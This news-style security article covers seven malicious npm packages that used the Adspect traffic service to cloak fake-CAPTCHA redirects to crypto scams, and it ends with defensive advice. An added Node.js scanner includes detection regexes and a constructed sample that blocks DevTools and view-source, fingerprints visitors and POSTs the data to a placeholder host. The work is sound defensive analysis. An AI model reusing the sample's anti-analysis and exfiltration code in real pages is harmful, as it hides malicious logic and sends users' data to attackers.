Researchers at Socket have identified seven malicious npm packages that weaponized the cloud-based traffic service Adspect to hide their behavior and redirect users to cryptocurrency scam websites. The incident illustrates how legitimate anti-bot and traffic-filtering tools can be repurposed as cloaking mechanisms in software supply chain attacks against the open-source ecosystem.
How Attackers Abused npm Packages and the Adspect Service
All seven packages were published on npm between September and November 2025 by a developer account using the alias dino_reborn (email: geneboo@proton[.]me). On the surface, these packages appeared to be typical web dependencies, increasing the likelihood that developers would install them as part of normal project work.
Adspect is marketed as a traffic-filtering and anti-bot platform designed to protect websites from automated abuse. In this campaign, it was used in the opposite way: as a cloaking tool to conceal malicious logic from security analysts and automated scanners, while selectively exposing the payload to real end users.
Six of the seven npm packages contained the core malicious JavaScript code. The seventh package, named signals-embed, functioned as a decoy component that built the initial web page from which the attack chain started.
Technical Analysis of the Malicious JavaScript Payload
Automatic Execution in the Browser via IIFE
The malicious payload consisted of roughly 39 KB of JavaScript wrapped in an IIFE (Immediately Invoked Function Expression). An IIFE is a function that executes as soon as it is defined. This design meant that as soon as a developer imported the package into a web application, the script would automatically run in the user’s browser without any explicit invocation in the application code.
Anti-analysis Techniques and DevTools Blocking
The code explicitly targeted security research and reverse engineering. It implemented several client-side protections:
- blocking the right-click context menu;
- disabling access to browser developer tools via F12;
- intercepting keyboard shortcuts such as Ctrl+U (view source) and Ctrl+Shift+I (DevTools);
- forcing a page reload if open DevTools were detected.
These techniques are common in phishing and fraud campaigns, where attackers aim to obstruct manual inspection and automated static or dynamic analysis of malicious pages.
Browser Fingerprinting and Victim Selection
In parallel, the script performed extensive browser fingerprinting to profile visitors. Among the collected attributes were:
- browser user agent string;
- language settings;
- protocol in use (HTTP or HTTPS);
- host domain and referrer;
- full URI and query parameters;
- character encoding and related metadata.
This data was sent to an attacker-controlled proxy server, while the real IP address of the user was forwarded to the Adspect API. Using this information, the attackers evaluated whether the visitor looked like a genuine potential victim or a security researcher, sandbox, or automated crawler.
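The anti-analysis tricks listed under DevTools blocking and the fingerprinting attributes listed above can be turned into a heuristic source scan for auditing a dependency before it ships. The following Node.js script is an added example, not Socket's tooling or code from the packages; its indicator regexes, weights, threshold and sample inputs are all constructed for illustration.

```javascript
// Added example, not Socket's tooling or the packages' code: heuristic
// source scan for the anti-analysis and fingerprinting indicators above.
// Regexes, weights and threshold are constructed; a high score means
// "inspect by hand", not proof of malice.
const INDICATORS = [
  // Whole file wrapped in an IIFE that runs on import (weak on its own)
  { id: 'iife-wrapper',      weight: 1, re: /^\s*[!(]\s*(?:async\s+)?function\b/ },
  // Right-click context menu suppressed
  { id: 'contextmenu-block', weight: 2, re: /contextmenu[\s\S]{0,120}?preventDefault|oncontextmenu\s*=/ },
  // F12 (keyCode 123) intercepted
  { id: 'f12-block',         weight: 3, re: /keyCode\s*===?\s*123|key\s*===?\s*['"]F12['"]/ },
  // Ctrl+U / Ctrl+Shift+I (keyCodes 85 / 73) intercepted
  { id: 'shortcut-block',    weight: 3, re: /ctrlKey[\s\S]{0,80}?(?:keyCode\s*===?\s*(?:85|73)|['"][UuIi]['"])/ },
  // Window-size DevTools check followed by a forced reload
  { id: 'devtools-reload',   weight: 3, re: /outerWidth\s*-\s*(?:window\.)?innerWidth[\s\S]{0,200}?location\.reload/ },
  // Reference to the traffic-filtering service used as a cloaker
  { id: 'traffic-service',   weight: 2, re: /adspect/i },
];
// Attributes the campaign collected; four or more together counts as profiling
const FINGERPRINT_ATTRS = [
  /navigator\.userAgent/, /navigator\.language/, /location\.protocol/, /location\.host/,
  /document\.referrer/, /location\.(?:href|search)/, /document\.(?:characterSet|charset)/,
];

function scanSource(src, threshold = 6) {
  const matched = INDICATORS.filter(i => i.re.test(src));
  const hits = matched.map(i => i.id);
  let score = matched.reduce((s, i) => s + i.weight, 0);
  const fingerprintAttrs = FINGERPRINT_ATTRS.filter(re => re.test(src)).length;
  if (fingerprintAttrs >= 4) { hits.push('fingerprinting'); score += 3; }
  return { hits, fingerprintAttrs, score, suspicious: score >= threshold };
}

// Constructed sample imitating the described behaviour (not the real 39 KB payload);
// the .invalid hosts are placeholders.
const SAMPLE_SUSPICIOUS = `(function () {
  document.addEventListener('contextmenu', e => e.preventDefault());
  document.addEventListener('keydown', e => {
    if (e.keyCode === 123 || (e.ctrlKey && (e.keyCode === 85 || (e.shiftKey && e.keyCode === 73)))) e.preventDefault();
  });
  setInterval(() => { if (window.outerWidth - window.innerWidth > 160) location.reload(); }, 500);
  const fp = { ua: navigator.userAgent, lang: navigator.language, proto: location.protocol, host: location.host,
    ref: document.referrer, uri: location.href, cs: document.characterSet };
  fetch('https://proxy.invalid/collect', { method: 'POST', body: JSON.stringify(fp) });
  window.open('https://adspect.invalid/?' + new URLSearchParams(fp));
})();`;
const SAMPLE_BENIGN = `export function debounce(fn, ms) { let t; return (...a) => { clearTimeout(t); t = setTimeout(() => fn(...a), ms); }; }`;

console.log(scanSource(SAMPLE_SUSPICIOUS));  // suspicious: true, score 17
console.log(scanSource(SAMPLE_BENIGN));      // suspicious: false, score 0
```

Run it over each JavaScript file in a newly added package (for example by reading `node_modules/<pkg>/**/*.js`) and review anything that crosses the threshold; legitimate libraries rarely combine keyboard interception, DevTools detection and a seven-attribute browser profile.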
Attack Flow: From Fake CAPTCHA to Crypto Scam
If the fingerprinting logic determined that the visitor was likely a real user, the script redirected the browser to a fake CAPTCHA page branded with cryptocurrency logos such as Ethereum or Solana. To most users, the page resembled a standard “I am not a robot” verification step.
Clicking through the CAPTCHA triggered a sequence that opened a new browser tab with a specially crafted Adspect URL. From there, Adspect redirected the victim to the cryptocurrency scam site. Because the navigation appeared to originate from a user interaction and a legitimate traffic service, it helped the attack bypass some browser protections and anti-fraud controls that look for automated or script-initiated redirects.
If the fingerprinting suspected a security tool or analyst, the script instead served a benign decoy page impersonating a company called Offlido. This reduced the likelihood that the campaign would be quickly detected, reported, and taken down.
Software Supply Chain Risks and npm Security Implications
This incident is another illustration of the growing threat of software supply chain attacks. Rather than compromising individual organizations one by one, adversaries increasingly plant malicious or backdoored packages in popular ecosystems such as npm, PyPI, and Maven, relying on developers’ trust in open-source repositories.
Industry reports, including Sonatype’s “State of the Software Supply Chain,” have documented a rapid increase in malicious and compromised open-source packages, numbering in the tens or even hundreds of thousands across ecosystems. This trend underscores that dependency security is no longer optional; it is a core part of application security programs.
Following Socket’s disclosure, all seven malicious packages were removed from the npm registry. However, the fact that they remained available for months highlights the limitations of registry-side controls and the need for stronger, layered defenses on the consumer side.
Practical Measures to Strengthen Open Source and npm Security
To reduce exposure to similar attacks, organizations and individual developers should treat third-party code with Zero Trust principles and adopt a set of concrete practices:
- Use software composition analysis (SCA) and specialized dependency scanners to detect known malicious or suspicious packages.
- Pin package versions with lock files (such as package-lock.json or yarn.lock) to avoid unexpected updates introducing malicious code.
- Conduct regular audits of dependencies, focusing on newly added or rarely used packages and anonymous or low-reputation publishers.
- Implement network egress controls so that front-end and back-end components cannot freely communicate with arbitrary domains or third-party APIs.
- Maintain a software bill of materials (SBOM) to gain visibility into all components used in applications and facilitate rapid response when a package is flagged.
As attackers continue to abuse legitimate services like Adspect and trusted ecosystems like npm, only a systematic, defense-in-depth approach to the software supply chain can prevent everyday dependencies from becoming covert delivery channels for malware and cryptocurrency scams. Prioritizing dependency hygiene, continuous monitoring, and strict validation of third-party code will significantly raise the cost of such campaigns for adversaries and reduce the risk of compromise for development teams.